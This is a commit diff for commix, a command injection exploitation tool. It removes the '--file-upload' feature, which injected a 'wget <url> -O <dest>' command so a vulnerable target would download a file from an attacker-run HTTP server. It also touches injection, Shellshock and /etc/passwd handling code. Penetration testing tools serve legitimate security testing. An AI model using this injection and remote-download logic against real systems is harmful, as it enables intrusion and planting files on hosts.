The deprecated --file-upload option has been removed, as --file-write provides nearly identical functionality

Author: stasinopoulos

doc/CHANGELOG.md

@@ -1,4 +1,5 @@
 ## Version 4.2 (TBA)
+* Revised: The deprecated `--file-upload` option has been removed, as `--file-write` provides nearly identical functionality.
 * Revised: Refactored `--time-sec` option to apply only to time-related techniques.
 * Revised: The deprecated `--tor-check` flag has been removed, and Tor connectivity is now handled internally with no separate check option.
 * Revised: Improved handling of injectable parameters in JSON objects.

src/core/injections/controller/checks.py

@@ -2642,11 +2642,11 @@ def delete_tmp(tmp_fname):
 """
 Check if file exists.
 """
-def check_file(dest_to_upload):
+def check_file(remote_file_path):
   if settings.TARGET_OS == settings.OS.WINDOWS:
-    cmd = settings.FILE_LIST_WIN + dest_to_upload.replace("\\","\\\\")
+    cmd = settings.FILE_LIST_WIN + remote_file_path.replace("\\","\\\\")
   else:
-    cmd = settings.FILE_LIST + dest_to_upload
+    cmd = settings.FILE_LIST + remote_file_path
     cmd = add_command_substitution(cmd)
   return cmd
 
@@ -2695,13 +2695,11 @@ def file_read_status(shell, file_to_read, filename):
     settings.print_data_to_stdout(settings.print_warning_msg(warn_msg))
 
 """
-Check upload/write destination
+Build the final destination path for file write operations.
 """
 def check_destination(destination):
   if menu.options.file_write:
     where = menu.options.file_write
-  else:
-    where = menu.options.file_upload
   if os.path.split(destination)[1] == "" :
     _ = os.path.split(destination)[0] + "/" + os.path.split(where)[1]
   elif os.path.split(destination)[0] == "/":
@@ -2751,98 +2749,6 @@ def file_write_status(shell, dest_to_write):
     warn_msg = "It seems you do not have permission to write files to the remote directory '" + dest_to_write + "'."
     settings.print_data_to_stdout(settings.print_warning_msg(warn_msg))
 
-"""
-Handle the file upload process to a remote target.
-"""
-def check_file_to_upload():
-  file_to_upload = menu.options.file_upload.encode(settings.DEFAULT_CODEC).decode()
-  try:
-    _urllib.request.urlopen(file_to_upload, timeout=settings.TIMEOUT)
-  except (_urllib.error.HTTPError, _urllib.error.URLError) as err_msg:
-    warn_msg = "The remote file '" + file_to_upload + "' does not appear to exist. (" +str(err_msg)+ ")"
-    settings.print_data_to_stdout(settings.print_warning_msg(warn_msg))
-    raise SystemExit()
-  except ValueError as err_msg:
-    err_msg = str(err_msg[0]).capitalize() + str(err_msg)[1]
-    settings.print_data_to_stdout(settings.print_critical_msg(err_msg))
-    raise SystemExit()
-  dest_to_upload = check_destination(destination=menu.options.file_dest)
-  info_msg = "Attempting to upload the file '"
-  info_msg += file_to_upload + "' to the remote directory '" + dest_to_upload + "'."
-  settings.print_data_to_stdout(settings.print_info_msg(info_msg))
-  # Execute command
-  cmd = settings.FILE_UPLOAD + file_to_upload + " -O " + dest_to_upload
-  return cmd, dest_to_upload
-
-"""
-File upload status.
-"""
-def file_upload_status(shell, dest_to_upload):
-  if shell:
-    info_msg = "The file has been successfully uploaded on remote directory '" + dest_to_upload + "'."
-    settings.print_data_to_stdout(settings.print_bold_info_msg(info_msg))
-  else:
-    warn_msg = "It seems you do not have permission to upload files on the remote directory '" + dest_to_upload + "'."
-    settings.print_data_to_stdout(settings.print_warning_msg(warn_msg))
-
-"""
-Check if defined "--file-upload" option.
-"""
-def file_upload():
-  if not re.match(settings.VALID_URL_FORMAT, menu.options.file_upload):
-    # if not menu.options.file_dest.endswith("/"):
-    #   menu.options.file_dest = menu.options.file_dest + "/"
-    # Check if not defined URL for upload.
-    while True:
-      message = "Do you want to enable a local HTTP server? [Y/n] > "
-      enable_HTTP_server = common.read_input(message, default="Y", check_batch=True)
-      if enable_HTTP_server in settings.CHOICE_YES:
-
-        # Check if file exists
-        if not os.path.isfile(menu.options.file_upload):
-          err_msg = "The '" + menu.options.file_upload + "' file, does not exist."
-          settings.print_data_to_stdout(settings.print_critical_msg(err_msg))
-          raise SystemExit()
-
-        # Setting the local HTTP server.
-        if settings.LOCAL_HTTP_IP == None:
-          while True:
-            message = "Please enter your interface IP address > "
-            ip_addr = common.read_input(message, default=None, check_batch=True)
-            # check if IP address is valid
-            ip_check = simple_http_server.is_valid_ipv4(ip_addr)
-            if ip_check == False:
-              err_msg = "The provided IP address seems not valid."
-              settings.print_data_to_stdout(settings.print_error_msg(err_msg))
-              pass
-            else:
-              settings.LOCAL_HTTP_IP = ip_addr
-              break
-
-        # Check for invalid HTTP server's port.
-        if settings.LOCAL_HTTP_PORT < 1 or settings.LOCAL_HTTP_PORT > 65535:
-          err_msg = "Invalid HTTP server's port (" + str(settings.LOCAL_HTTP_PORT) + ")."
-          settings.print_data_to_stdout(settings.print_critical_msg(err_msg))
-          raise SystemExit()
-
-        http_server = "http://" + str(settings.LOCAL_HTTP_IP) + ":" + str(settings.LOCAL_HTTP_PORT)
-        info_msg = "Setting the HTTP server on '" + http_server + "/'. "
-        settings.print_data_to_stdout(settings.print_info_msg(info_msg))
-        menu.options.file_upload = http_server + menu.options.file_upload
-        simple_http_server.main()
-        break
-
-      elif enable_HTTP_server in settings.CHOICE_NO:
-        if not re.match(settings.VALID_URL_FORMAT, menu.options.file_upload):
-          err_msg = "The provided '--file-upload' option requires the activation of a local HTTP server."
-          settings.print_data_to_stdout(settings.print_critical_msg(err_msg))
-          raise SystemExit()
-        break
-      elif enable_HTTP_server in settings.CHOICE_QUIT:
-        raise SystemExit()
-      else:
-        common.invalid_option(enable_HTTP_server)
-        pass
 
 def define_vulnerable_http_header(http_header_name):
   if http_header_name == settings.USER_AGENT.lower():
@@ -2865,11 +2771,6 @@ def check_wrong_flags():
     if menu.options.passwords:
       warn_msg = "The '--passwords' option is not yet supported on Windows targets."
       settings.print_data_to_stdout(settings.print_warning_msg(warn_msg))
-    if menu.options.file_upload :
-      warn_msg = "The '--file-upload' option is not yet supported on Windows targets. "
-      warn_msg += "Instead, use the '--file-write' option."
-      settings.print_data_to_stdout(settings.print_warning_msg(warn_msg))
-      raise SystemExit()
   else:
     if menu.options.is_admin :
       warn_msg = "Switching '--is-admin' to '--is-root' because "

src/core/injections/controller/file_access.py

@@ -97,51 +97,6 @@ def file_write(separator, maxlen, TAG, cmd, prefix, suffix, whitespace, timesec,
       settings.print_data_to_stdout(settings.SINGLE_WHITESPACE)
   checks.file_write_status(shell, dest_to_write)
 
-"""
-Upload a file on the target host.
-"""
-def file_upload(separator, maxlen, TAG, cmd, prefix, suffix, whitespace, timesec, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, url_time_response, technique):
-  if technique == settings.INJECTION_TECHNIQUE.CLASSIC:
-    from src.core.injections.results_based.techniques.classic import cb_injector as injector
-  elif technique == settings.INJECTION_TECHNIQUE.DYNAMIC_CODE:
-    from src.core.injections.results_based.techniques.eval_based import eb_injector as injector
-  elif technique == settings.INJECTION_TECHNIQUE.TIME_BASED:
-    from src.core.injections.blind.techniques.time_based import tb_injector as injector
-  elif technique == settings.INJECTION_TECHNIQUE.FILE_BASED:   
-    from src.core.injections.semiblind.techniques.file_based import fb_injector as injector
-  else:
-    from src.core.injections.semiblind.techniques.tempfile_based import tfb_injector as injector
-  cmd, dest_to_upload = checks.check_file_to_upload()
-  if settings.TIME_RELATED_ATTACK:
-    if technique == settings.INJECTION_TECHNIQUE.TIME_BASED:
-      check_exec_time, shell = injector.injection(separator, maxlen, TAG, cmd, prefix, suffix, whitespace, timesec, http_request_method, url, vuln_parameter, alter_shell, filename, url_time_response, technique)
-    else:
-      check_exec_time, shell = injector.injection(separator, maxlen, TAG, cmd, prefix, suffix, whitespace, timesec, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, url_time_response, technique)
-  else:
-    if technique == settings.INJECTION_TECHNIQUE.FILE_BASED:
-      response = injector.injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, technique)
-    else:
-      response = injector.injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, technique)
-    shell = injector.injection_results(response, TAG, cmd, technique, url, OUTPUT_TEXTFILE, timesec)
-  shell = "".join(str(p) for p in shell)
-  cmd = checks.check_file(dest_to_upload)
-  if settings.TIME_RELATED_ATTACK:
-    check_exec_time, shell = injector.injection(separator, maxlen, TAG, cmd, prefix, suffix, whitespace, timesec, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, url_time_response, technique)
-  else:
-    if settings.USE_BACKTICKS:
-      cmd = checks.remove_command_substitution(cmd)
-    if technique == settings.INJECTION_TECHNIQUE.FILE_BASED:
-      response = injector.injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, technique)
-    else:
-      response = injector.injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, technique)
-    shell = injector.injection_results(response, TAG, cmd, technique, url, OUTPUT_TEXTFILE, timesec)
-  shell = "".join(str(p) for p in shell)
-  if settings.TIME_RELATED_ATTACK:
-    if settings.VERBOSITY_LEVEL == 0:
-      settings.print_data_to_stdout(settings.SINGLE_WHITESPACE)
-  checks.file_upload_status(shell, dest_to_upload)
-
-
 """
 Read a file from the target host.
 """
@@ -190,15 +145,7 @@ def do_check(separator, maxlen, TAG, cmd, prefix, suffix, whitespace, timesec, h
   if menu.options.file_write:
     file_write(separator, maxlen, TAG, cmd, prefix, suffix, whitespace, timesec, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, url_time_response, technique)
     settings.FILE_ACCESS_DONE = True
-
-  if menu.options.file_upload:
-    if settings.TARGET_OS == settings.OS.WINDOWS:
-      check_option = "--file-upload"
-      checks.unavailable_option(check_option)
-    else:
-      file_upload(separator, maxlen, TAG, cmd, prefix, suffix, whitespace, timesec, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, url_time_response, technique)
-    settings.FILE_ACCESS_DONE = True
-
+    
   if menu.options.file_read:
     file_read(separator, maxlen, TAG, cmd, prefix, suffix, whitespace, timesec, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, url_time_response, technique)
     settings.FILE_ACCESS_DONE = True

src/core/injections/controller/injector.py

@@ -56,7 +56,7 @@ def time_related_injection(separator, maxlen, TAG, cmd, prefix, suffix, whitespa
       else:
         cmd = "powershell.exe -InputFormat none write-host ([string](cmd /c " + cmd + ")).trim()"
 
-  if menu.options.file_write or menu.options.file_upload:
+  if menu.options.file_write:
     minlen = 0
   else:
     minlen = 1

src/core/main.py

@@ -496,14 +496,13 @@ def main(filename, url, http_request_method):
         raise SystemExit()
 
     # Check the file-destination
-    if menu.options.file_write and not menu.options.file_dest or \
-    menu.options.file_upload  and not menu.options.file_dest:
-      err_msg = "Host's absolute filepath to write and/or upload, must be specified (i.e. '--file-dest')."
+    if menu.options.file_write and not menu.options.file_dest:
+      err_msg = "Host's absolute filepath to write, must be specified (i.e. '--file-dest')."
       settings.print_data_to_stdout(settings.print_critical_msg(err_msg))
       raise SystemExit()
 
-    if menu.options.file_dest and menu.options.file_write == None and menu.options.file_upload == None:
-      err_msg = "You must enter the '--file-write' or '--file-upload' parameter."
+    if menu.options.file_dest and menu.options.file_write == None:
+      err_msg = "You must enter the '--file-write' parameter."
       settings.print_data_to_stdout(settings.print_critical_msg(err_msg))
       raise SystemExit()
 
@@ -522,18 +521,6 @@ def main(filename, url, http_request_method):
                                                    password=password
                                                    )
       try:
-        # Check if defined "--file-upload" option.
-        if menu.options.file_upload:
-          menu.options.file_upload = os.path.abspath(menu.options.file_upload)
-          checks.file_upload()
-          try:
-            _urllib.request.urlopen(menu.options.file_upload, timeout=settings.TIMEOUT)
-          except _urllib.error.HTTPError as err_msg:
-            settings.print_data_to_stdout(settings.print_critical_msg(str(err_msg.code)))
-            raise SystemExit()
-          except _urllib.error.URLError as err_msg:
-            settings.print_data_to_stdout(settings.print_critical_msg(str(err_msg.reason) + "."))
-            raise SystemExit()
         try:
           info_msg = "Performing heuristic (passive) tests on the target URL."
           settings.print_data_to_stdout(settings.print_info_msg(info_msg))
@@ -566,7 +553,6 @@ def main(filename, url, http_request_method):
         if menu.options.tamper:
           settings.USER_APPLIED_TAMPER = menu.options.tamper
           checks.tamper_scripts(stored_tamper_scripts=False)
-
       except AttributeError:
         pass
 

src/core/modules/shellshock/shellshock.py

@@ -164,17 +164,6 @@ def file_access(url, cve, check_header, filename):
     checks.file_write_status(shell, dest_to_write)
     settings.FILE_ACCESS_DONE = True
 
-  if menu.options.file_upload:
-    cmd, dest_to_upload = checks.check_file_to_upload()
-    shell, payload = cmd_exec(url, cmd, cve, check_header, filename)
-    shell = "".join(str(p) for p in shell)
-    cmd = checks.check_file(dest_to_upload)
-    cmd = checks.remove_command_substitution(cmd)
-    shell, payload = cmd_exec(url, cmd, cve, check_header, filename)
-    shell = "".join(str(p) for p in shell)
-    checks.file_upload_status(shell, dest_to_upload)
-    settings.FILE_ACCESS_DONE = True
-
   if menu.options.file_read:
     cmd, file_to_read = checks.file_content_to_read()
     cmd = checks.remove_command_substitution(cmd)

src/utils/menu.py

@@ -417,15 +417,10 @@ def banner():
                 dest="file_write",
                 help="Write to a file on the target host.")
 
-file_access.add_option("--file-upload",
-                action="store",
-                dest="file_upload",
-                help="Upload a file on the target host.")
-
 file_access.add_option("--file-dest",
                 action="store",
                 dest="file_dest",
-                help="Host's absolute filepath to write and/or upload to.")
+                help="Host's absolute filepath to write to.")
 
 # Modules options
 modules = OptionGroup(parser, Style.BRIGHT + Style.UNDERLINE + "Modules" + Style.RESET_ALL,
@@ -753,7 +748,7 @@ def enumeration_options():
 Check if file access options are enabled.
 """
 def file_access_options():
-  if any((options.file_write, options.file_upload, options.file_read)):
+  if any((options.file_write, options.file_read)):
     return True
 
 # eof

src/utils/settings.py

@@ -262,7 +262,7 @@ def sys_argv_errors():
 DESCRIPTION = "The command injection exploiter"
 AUTHOR  = "Anastasios Stasinopoulos"
 VERSION_NUM = "4.2"
-REVISION = "20"
+REVISION = "21"
 STABLE_RELEASE = False
 VERSION = "v"
 if STABLE_RELEASE:
@@ -704,9 +704,6 @@ class OS(object):
 # Write file
 FILE_WRITE = "printf "
 
-# Write file
-FILE_UPLOAD = "wget "
-
 # /etc/passwd
 PASSWD_FILE = "/etc/passwd"